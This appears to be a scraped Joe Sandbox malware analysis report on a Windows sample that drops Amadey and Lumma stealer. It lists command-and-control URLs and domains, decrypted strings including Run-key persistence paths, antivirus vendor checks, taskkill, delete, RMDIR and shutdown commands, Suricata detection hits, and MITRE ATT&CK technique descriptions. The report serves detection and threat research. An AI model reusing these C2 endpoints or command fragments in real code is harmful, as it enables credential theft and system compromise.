Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: std::invalid_argument::invalid_argument
String ID: pScheduler$version
API String ID: 2141394445-3154422776
Opcode ID: b8b76dd8c5e27833ee882a564711a00d3b36330d89391f9983688d019b8d9aa4
Instruction ID: a5dcf427e318a4acfd77b487d2af2adcd5f614de08395be0ecdd9f27d92239ae
Opcode Fuzzy Hash: b8b76dd8c5e27833ee882a564711a00d3b36330d89391f9983688d019b8d9aa4
Instruction Fuzzy Hash: 52E02634440208F6CF26FE14D80BADC73749B05704F40C222B801111818BBC8388DA81

Source: https://fancywaxxers.shop/apih	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/api$F	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpS	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpR	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpa/	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpncoded	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/hn7:C	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop:443/api	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpI/	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop:443/apiDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpE/	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php1/	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpded	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/in	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/ah	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpn	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php)/	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php%/	Avira URL Cloud: Label: malware

Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: Dl6wuWiQdg.exe.6248.0.memstrmin	Malware Configuration Extractor: LummaC {"C2 url": ["nearycrepso.shop", "tirepublicerj.shop", "abruptyopsn.shop", "fancywaxxers.shop", "framekgirus.shop", "wholersorie.shop", "cloudewahsj.shop", "noisycuttej.shop", "rabidcowse.shop"], "Build id": "W0uk--"}

Source: Malware configuration extractor	URLs: nearycrepso.shop
Source: Malware configuration extractor	URLs: tirepublicerj.shop
Source: Malware configuration extractor	URLs: abruptyopsn.shop
Source: Malware configuration extractor	URLs: fancywaxxers.shop
Source: Malware configuration extractor	URLs: framekgirus.shop
Source: Malware configuration extractor	URLs: wholersorie.shop
Source: Malware configuration extractor	URLs: cloudewahsj.shop
Source: Malware configuration extractor	URLs: noisycuttej.shop
Source: Malware configuration extractor	URLs: rabidcowse.shop
Source: Malware configuration extractor	IPs: 185.215.113.43

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen

Source: Dl6wuWiQdg.exe	Virustotal: Detection: 56%			Perma Link
Source: Dl6wuWiQdg.exe	ReversingLabs: Detection: 60%

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Joe Sandbox ML: detected

Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp	String decryptor: 185.215.113.43
Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp	String decryptor: /Zu7JuNko/index.php
Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp	String decryptor: S-%lu-
Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp	String decryptor: abc3bc1985
Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp	String decryptor: skotes.exe
Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp	String decryptor: Startup
Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp	String decryptor: cmd /C RMDIR /s/q
Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp	String decryptor: rundll32
Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp	String decryptor: Programs
Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp	String decryptor: %USERPROFILE%
Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp	String decryptor: cred.dll\|clip.dll\|
Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp	String decryptor: cred.dll
Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp	String decryptor: clip.dll
Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp	String decryptor: http://
Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp	String decryptor: https://
Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp	String decryptor: /quiet
Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp	String decryptor: /Plugins/
Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp	String decryptor: &unit=
Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp	String decryptor: shell32.dll
Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp	String decryptor: kernel32.dll
Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp	String decryptor: GetNativeSystemInfo
Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp	String decryptor: ProgramData\
Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp	String decryptor: AVAST Software
Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp	String decryptor: Kaspersky Lab
Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp	String decryptor: Panda Security
Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp	String decryptor: Doctor Web
Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp	String decryptor: 360TotalSecurity
Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp	String decryptor: Bitdefender
Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp	String decryptor: Norton
Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp	String decryptor: Sophos
Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp	String decryptor: Comodo
Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp	String decryptor: WinDefender
Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp	String decryptor: 0123456789
Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp	String decryptor: ------
Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp	String decryptor: ?scr=1
Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp	String decryptor: ComputerName
Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp	String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp	String decryptor: -unicode-
Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp	String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp	String decryptor: VideoID
Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp	String decryptor: DefaultSettings.XResolution
Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp	String decryptor: DefaultSettings.YResolution
Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp	String decryptor: ProductName
Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp	String decryptor: CurrentBuild
Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp	String decryptor: rundll32.exe
Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp	String decryptor: "taskkill /f /im "
Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp	String decryptor: " && timeout 1 && del
Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp	String decryptor: && Exit"
Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp	String decryptor: " && ren
Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp	String decryptor: Powershell.exe
Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp	String decryptor: -executionpolicy remotesigned -File "
Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp	String decryptor: shutdown -s -t 0
Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp	String decryptor: random

Source: Network traffic	Suricata IDS: 2058656 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fancywaxxers .shop) : 192.168.2.6:49371 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.6:49712 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.6:49718 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.6:49717 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.6:49715 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.6:49716 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.6:49742 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.6:49713 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.6:49725 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.6:49946 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49713 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49713 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49718 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49712 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49712 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49742 -> 104.21.112.1:443

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Dl6wuWiQdg.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Threatname: Amadey

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe

C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Windows\Tasks\skotes.job

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Windows Analysis Report
Dl6wuWiQdg.exe

Function 00D5735A Relevance: 2.5, APIs: 1, Instructions: 1031
COMMON

Function 00D59BA5 Relevance: 3.1, APIs: 2, Instructions: 140
sleepsynchronizationCOMMON

Function 00D59F44 Relevance: 3.1, APIs: 2, Instructions: 137
sleepsynchronizationCOMMON

Function 00D5A079 Relevance: 3.1, APIs: 2, Instructions: 136
sleepsynchronizationCOMMON

Function 00D5A1AE Relevance: 3.1, APIs: 2, Instructions: 135
sleepsynchronizationCOMMON

Function 00D5A418 Relevance: 3.1, APIs: 2, Instructions: 133
sleepsynchronizationCOMMON

Function 00D5A54D Relevance: 3.1, APIs: 2, Instructions: 132
sleepsynchronizationCOMMON

Function 00D5A682 Relevance: 3.1, APIs: 2, Instructions: 131
sleepsynchronizationCOMMON

Function 00D59ADC Relevance: 3.1, APIs: 2, Instructions: 107
sleepsynchronizationCOMMON

Function 00D5A856 Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Function 00D5A34F Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Function 00D6D3E2 Relevance: 1.7, APIs: 1, Instructions: 204
COMMON

Function 00D68F40 Relevance: 1.7, APIs: 1, Instructions: 197
COMMON

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
